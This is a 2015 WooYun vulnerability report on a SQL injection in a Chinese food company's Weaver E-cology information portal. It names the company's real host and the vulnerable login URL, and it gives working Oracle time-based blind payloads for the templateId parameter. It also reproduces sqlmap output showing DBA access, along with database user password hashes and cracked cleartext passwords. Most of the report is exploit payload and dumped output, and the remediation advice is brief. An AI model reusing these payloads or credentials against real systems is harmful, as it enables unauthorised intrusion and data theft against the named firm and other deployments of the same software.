今麦郎某系统SQL注入漏洞 | wooyun-2015-0114961

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0114961

漏洞标题：

今麦郎某系统SQL注入漏洞

漏洞详情

披露状态：

2015-05-19：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-07-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

今麦郎食品集团信息门户系统SQL注入

详细说明：

今麦郎食品集团信息门户系统SQL注入。

漏洞证明：

访问今麦郎饮品有限公司官网，http://www.jmlyp.com/，右上角信息门户系统。
http://home.jmlyp.com/login/Login.jsp?logintype=1

登陆页面测试一下是否有注入，然后跳转到存在注入页面；
http://home.jmlyp.com/wui/theme/ecology7/page/login.jsp?templateId=101&logintype=1&gopage=&languageid=7&message=55

用的系统实际是泛微E-COLOGY，templateId参数存在SQL注入，直接放到sqlmap里面跑即可。
oracle盲注，跑起来很慢。
sqlmap信息。dba权限，Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi版本，

Parameter: templateId (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: templateId=101' AND 3194=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(76)||CHR(80)||CHR(114),5) AND 'FKyh'='FKyh&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi'
current user:    'COLOGY'
current schema (equivalent to database on Oracle):    'COLOGY'
hostname:    'cology.jmlyp.com'
current user is DBA:    True

database management system users

database management system users [22]:
[*] ANONYMOUS
[*] COLOGY
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] COLOGY [1]:
    password hash: 02B594CB6E4804F3
    clear-text password: COLOGY
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] DBSNMP [1]:
    password hash: FFF45BB2C0C327EC
    clear-text password: ORACLE
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: DMSYS
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: EXFSYS
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_VIEW [1]:
    password hash: 442167C25FAC883C
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
    clear-text password: MANAGER
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
    password hash: 8A8F029737A9097A\x03
[*] SYSMAN [1]:
    password hash: 2CA614501F09FCCC
    clear-text password: ORACLE
[*] SYSTEM [1]:
    password hash: 2D594E86F93B17A1
    clear-text password: ORACLE
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL

数据库信息，后面没再跑，太慢了

Parameter: templateId (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: templateId=101' AND 7017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(65)||CHR(85)||CHR(106),5) AND 'ekFf'='ekFf&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] "COLOGY\X05\X11"
[*] "SYSMAN\X11"
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDYYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

验证到此为止，应该可以说明问题了

修复方案：

过滤，审计泛微版本

版权声明：转载请注明来源 TT向上@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞